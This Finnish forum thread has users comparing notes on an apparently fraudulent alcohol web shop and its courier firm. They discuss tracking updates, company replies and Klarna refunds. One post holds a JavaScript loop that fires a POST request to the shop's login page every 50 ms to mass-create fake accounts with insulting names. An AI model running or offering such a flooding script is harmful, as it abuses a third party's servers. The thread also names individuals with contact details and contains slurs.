Follow along with the video below to see how to install our site as a web app on your home screen.
Huomio: This feature may not be available in some browsers.
No siinä tapauksessa olisi jo aikoja sitten pitänyt ottaa yhteyttä pankkiin tosin.. Viime viikoks oli joillekkin luvattu, ei tullut. Joten eiköhän tää ollu tässä, vaan tällä kertaa kukaan ei saa mitään juomia (vai saiko viimeksikään?). Suosittelen todellakin Klarnan kanssa toimimista nyt jos haluaa rahojaan takas.Mitenhän on jos olisit tilannut verkkopankilla?
Aina tulee mieleen että rahat olisivat menneet varmasti mutta voi olla niinkin että homma olisi jo taputeltu. Uhkaus Poliisilla ja vastaus " pahoittelemme logistiikan ongelmia, olemme luotettava yritys ja haluamme että maineemme ei tahriinnu. Palautus näkyy tililläsi parin pankkipäivän kuluessa"
Joo kummallisesti nämä päivittyvät ympäri Suomea saman pienen ajanjakson sisällä. Ihan älyttömän yllättäväätänään on sitten ainakin kolmen lähetyksen status päivitetty aika välillä 7.15-7.38
Klarnan maksuturvahan ei ole voimassa kortilla maksaessa, tästä toki varmasti tiedon jo saitkin Klarnalta. Toki hyvä sinnekin ilmoittaa, mutta luottokorttiyhtiön puoleen kannattaa olla yhteyksissä.Laitoin itsekin pullo24:n tilauksesta valituksen klarnalle. Maksettu luottokortilla, mutta klarna kuitenkin välikätenä tuossa.
Hassuja selityksiä miksi rahti liikkuu etananlailla
By my information, on Tuesday your parcel was arrived to Hämeenlinna for registration.
Unfortunately our drivers do not make deliveries directly from start point to final point. All the parcels are moving between stocks at different locations in direction of destination point. This is the reason, that even 400km can take a little bit longer delivery than expected.
Veikkaan et hetken saat odottaaSiis täähän on sivu minkä ekaksi avaan ja viimesenä luen. Odotan jännitysellä ensimmäistä selfietä pullo kädessä.
Se on tämmöinen mukava harrastus aina parin päivän välein lähettää näille sankareille postia ja ihan suoraan vittuilla niille. Olen jo monta kertaa kirjoittanut että tää teidän homma ihan ihan täyttä kusetusta, mutta ihan viihdyttävää odottaa mitä te aina vastaatte. Ihme että silti sieltä suolletaan vastauksia. Naurattaa joka kerta.Hei xxxxxx,
Unfortunately we do not have an office in xxxxx with workers, who can be in place and give the parcels. This is the reason we should wait once our driver will pick up your parcel from our stock and deliver it to you.
Terveisin / Regards,
Imre Kuuse
CEO, Fastlines Logistics OÜ
+372 5399 6893
imre@fastlines-logistics.com
Fastlines Logistics OÜ | Logistika, kaubavedu, laondus, ekspedeerimine
Ja tracking näyttää että tälle paikkakunnalle ois tosiaan saapunut jo viime viikon perjantaina.
At 04.02.2022 17:15, xxxxxx :: The consignment is available for pickup at xxxxxx
Kumma, että joku tänne pikkukylään tois paketin odottamaan, että joku toinen sen kuskaa loppumatkan. Ja vielä kun ei oo tuota officea heillä täällä, ni minnehän on toimitus sitten viety...
Alkaa kyllä usko ja toivo hiipumaan totaalisesti siihen, että tuolta jotain joku saisi. ViiniVodkasta olen joskus tilannut ja tavarat saanutkin.
Onko taas lupailtu, että loppuviikolla ois toimituksia kenelläkään?
Viime viikon keskiviikkona sai tälläista vastausta:
Hyvää päivää!
>
> Teemme läheistä yhteistyötä toimitusyrityksen kanssa
> varmistaaksemme, että saat tilauksesi mahdollisimman pian.
> Odotamme toimitustasi viikon lopussa.
>
> Jäljitystietojen mukaan toinen paketeistasi on lähetetty Turusta ja
> toinen odottaa matkaa Helsingistä reitin varrella.
>
> With Regards,
>
> Ervin Voit
> Sales Manager
> GIFTS FOR THE HOME LTD
> 2nd Floor College House,
> 17 King Edwards Road, Ruislip
> London, HA4-7AE, UK
> ervin@pullo24.fi https://pullo24.fi
Onhan tää ollu kyllä ihan seurannan arvoinen case tähän mennessä!
Joo että sellainen "tutkintaosasto" Klarnalla. Tämänkin keskustelun on ilmeisesti sinne jo useampikin linkannut, mutta ei sielläkään sitten hissi taida kulkea yläkerroksiin asti. Enemmän tällä foorumilla on kaivettu tästä huijauksesta tietoa käyttäjien toimesta, kuin joku Klarnan toimistorotta tulee koskaan kaivamaankaan.Klarna avasi laskut uudestaan koska pullo24 oli ilmoittanut niiden saapuneen valitsemaani toimipisteeseen. Kuitenkin imre kuuse lähetti minulle sähköpostia että niillä ei ole officea suomessa missä olisi työntekijöitä joten kuski tuo ne minulle. Toimitin klarnalle vähän faktoja tästä lafkasta niin katsotaan mitä ne sieltä vastaavat.
No eikös Klarna maksa aina heti, kuten täälläkin on taitu tehdä selväksi. Tilanne taitaa olla se että pullo24 yrittää kaikin tavoin välttää Klarnan perimästä takaisin jo maksettuja rahoja. Joita tuskin edes enää mistään löytyy...Aikamoista touhua klarnalta. Taitaa tilanne olla niillä se että ovat maksaneet koijareille..
Lähetin viestiä VIINIVODKALLE! ja ketkäs sieltä vastaileekaan.Siellä on pojat laittaneet muuten ViiniVodkan sivutkin pystyyn taas.![]()
Hei XXXXXX,
I would advise you to choose a respectful tone when communicating with people you even do not know.
And it doesn't matter if you communicate in person face to face or via the Internet - in any case, you must choose a respectful tone and not use abusive or offensive language. Do you want the company that serves you to treat you with respect and that the driver treats your packages with respect?
So why do you yourself behave so strangely and vilely towards other people?
Terveisin / Regards,
Imre Kuuse
CEO, Fastlines Logistics OÜ
+372 5399 6893
imre@fastlines-logistics.com
https://www.fastlines-logistics.com/
---------- Forwarded message ---------
From: Ervin Voit | Pullo24.fi <ervin@pullo24.fi>
Subject: Fwd: Huijaukset jatkuu?
Date: Feb 8 2022, at 11:41 pm
To: Imre <imre@fastlines-logistics.com>
please manage
-------- Original Message --------
Subject: Huijaukset jatkuu?
Date: 2022-02-08 17:04
From: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
To: info@viinivodka.fi
Hei kyrpänaamat!
Eikö Pullo24 nimissä tehty huijaus riittänyt? Meinaatteko yrittää
puhaltaa uudestaan toisen "firman" nimissä, vaikka samat velliperseet
pyörittää tätä touhua samojen pöytälaatikkofirmojen kautta?
Eikö keksityn seurannan päivittäminen ole turhan työlästä hommaa
siihen nähden, että oikeasti hoitaisi bisneksiä niin kuin niitä
pitää hoitaa?Mikä on työnjako tällä kertaa? Imre huijaa
väärennetyllä seurannalla, Sergei myy ja delegoi "ongelmia" Imrelle
ja Imre käskee Erviniä vastailemaan?
Parempi ottaa yhteyttä jo tässä vaiheessa suoraan Klarnaan, jotta
osaavat välttää yhteistyötä teidän apinoiden kanssa.
--
With Regards,
Ervin Voit
Sales Manager
GIFTS FOR THE HOME LTD
2nd Floor College House,
17 King Edwards Road, Ruislip
London, HA4-7AE, UK
ervin@pullo24.fi
https://pullo24.fi
Noh tuota niinniin. Aika rajua tekstiä. Siihen en ota kantaa hyvää vai huonoa. Ainakin sait vastaukseksi muutakin kuin hyvää ja tiivistä yhteistyötä kuljetusliikkeen kanssa.Lähetin viestiä VIINIVODKALLE! ja ketkäs sieltä vastaileekaan.
Koodi:Hei XXXXXX, I would advise you to choose a respectful tone when communicating with people you even do not know. And it doesn't matter if you communicate in person face to face or via the Internet - in any case, you must choose a respectful tone and not use abusive or offensive language. Do you want the company that serves you to treat you with respect and that the driver treats your packages with respect? So why do you yourself behave so strangely and vilely towards other people? Terveisin / Regards, Imre Kuuse CEO, Fastlines Logistics OÜ +372 5399 6893 imre@fastlines-logistics.com https://www.fastlines-logistics.com/ ---------- Forwarded message --------- From: Ervin Voit | Pullo24.fi <ervin@pullo24.fi> Subject: Fwd: Huijaukset jatkuu? Date: Feb 8 2022, at 11:41 pm To: Imre <imre@fastlines-logistics.com> please manage -------- Original Message -------- Subject: Huijaukset jatkuu? Date: 2022-02-08 17:04 From: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx> To: info@viinivodka.fi Hei kyrpänaamat! Eikö Pullo24 nimissä tehty huijaus riittänyt? Meinaatteko yrittää puhaltaa uudestaan toisen "firman" nimissä, vaikka samat velliperseet pyörittää tätä touhua samojen pöytälaatikkofirmojen kautta? Eikö keksityn seurannan päivittäminen ole turhan työlästä hommaa siihen nähden, että oikeasti hoitaisi bisneksiä niin kuin niitä pitää hoitaa?Mikä on työnjako tällä kertaa? Imre huijaa väärennetyllä seurannalla, Sergei myy ja delegoi "ongelmia" Imrelle ja Imre käskee Erviniä vastailemaan? Parempi ottaa yhteyttä jo tässä vaiheessa suoraan Klarnaan, jotta osaavat välttää yhteistyötä teidän apinoiden kanssa. -- With Regards, Ervin Voit Sales Manager GIFTS FOR THE HOME LTD 2nd Floor College House, 17 King Edwards Road, Ruislip London, HA4-7AE, UK ervin@pullo24.fi https://pullo24.fi
setInterval(async function(){
try{
let mail = `${Math.random(0).toString(36).substr(2)}%40pullo24.fi`;
fetch("https://pullo24.fi/login", {
"headers": {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-language": "en-GB,en-US;q=0.9,en;q=0.8,fi;q=0.7,et;q=0.6",
"cache-control": "no-cache",
"content-type": "application/x-www-form-urlencoded",
"pragma": "no-cache",
"upgrade-insecure-requests": "1"
},
"referrer": "https://pullo24.fi/login?back=my-account",
"referrerPolicy": "strict-origin-when-cross-origin",
"body": `id_gender=1&customer_firstname=haistakaa&customer_lastname=vitturyssahomot&email=${mail}&passwd=asd1234&days=4&months=3&years=1910&newsletter=1&optin=1&email_create=1&is_new_customer=1&back=my-account&submitAccount=`,
"method": "POST",
"mode": "cors",
"credentials": "include"
}).then(e => {
console.log("New user created!:", mail.replace("%40", "@"), " - Pwd: asd1234")
});
}catch {
}
},50);
Sehän on selvää ettei olemattomia tuotteita tarvii kenenkään maksaa. Ei tarvii olla yhtään huolissaan että pitäisi klarnalle jotain maksaa. Koko juoni selviää Klarnalle varmasti hyvin nopeasti.
mitä maine haittaa tästä on klarnalle? Mitä kuluttaja tästä menettää? Klarnahan tässä rahansa menettää ja sen homma on periä rahat takaisin.Olihan tämä ihan hauskaa luettavaa vaikka itse en olekaan tuolta mitään tilannut.
Poliisia tämä homma tuskin vielä tässä vaiheessa kiinnostaa, mutta ehkä kannattaisi vinkata iltapaskoja, Hesaria ja vaikka Yleä, ja ottaa kärjeksi vaikka sen että Klarna tekee yhteistyötä tunnettujen huijarien kanssa. Luulisi että toimittajan yhteydenoton ja yhden lehtijutun jälkeen potentiaalinen asiakaskunta pienenee ja Klarnakin varmaan reagoi ettei tule enempää mainehaittaa.
mitä maine haittaa tästä on klarnalle? Mitä kuluttaja tästä menettää? Klarnahan tässä rahansa menettää ja sen homma on periä rahat takaisin.
Klarnahan tässä antaa kuluttajalle suojan kun tilaa tavaran…0
Itseasiassa klarna ei ole ollut yhteyksissä. Tuli vaan joku automaattivastaus, että lasku laitettu taukotilaan tms. Näin kyllä ajattelinkin, että täytyy luottokorttiyhtiöön olla yhteyksissä. En oo vielä saanut tätä aikaiseksi, mutta kannattaa varmaan piakkoin laitella... Ei mulla tuo lasku ollu kun jotain alle 70€, että ei suuri menetys onneksi.Klarnan maksuturvahan ei ole voimassa kortilla maksaessa, tästä toki varmasti tiedon jo saitkin Klarnalta. Toki hyvä sinnekin ilmoittaa, mutta luottokorttiyhtiön puoleen kannattaa olla yhteyksissä.
Itselle tämä tuli viimevuonna tutuksi kun en Klarnan "pikkupränttejä" lukenut ja tilasin käytetyn business läppärin kotimaiselta toimijalta, sitä koskaan saamatta (maksu klarnan kautta kortilla). Rahat onneksi sain takaisin...
Mulla toimii mutta jotenkin ne ovat päin v*ttua ja myös viinivodkassa sama homma.pullo24 sivut ainakin mulla hävinneet
Reilun viikon ”olleet” Helsingissä. Aika hankala varmaan päivittää mitään kun tulossa VantaalleFastlinen sivut toimivat sentään, mites onko kuskin vehkeet toimineet tänään ja paketit edenneet?![]()
Kyllä. En näe tuossa muuta mahdollisuutta!![]()
Jipii! Tänään pitäisi olla kai perillä?
![]()
Jipii! Tänään pitäisi olla kai perillä?
Toihan on info että kuski voi noutaa sen ja sit tuoda sulleAt 31.01.2022 06:39, Turku :: The consignment is ready for delivery at the Parcel Pick-up Point from Turku
At 02.02.2022 08:49, Turku :: The consignment is on its way
At 04.02.2022 16:56, Turku :: The consignment is available for pickup at Turku
Nurkilla se omakin lähetys pyörii. Mistään ei voi kuulemma noutaa ja Imren mukaan kuski soittaa, kun lähetys on tulossa.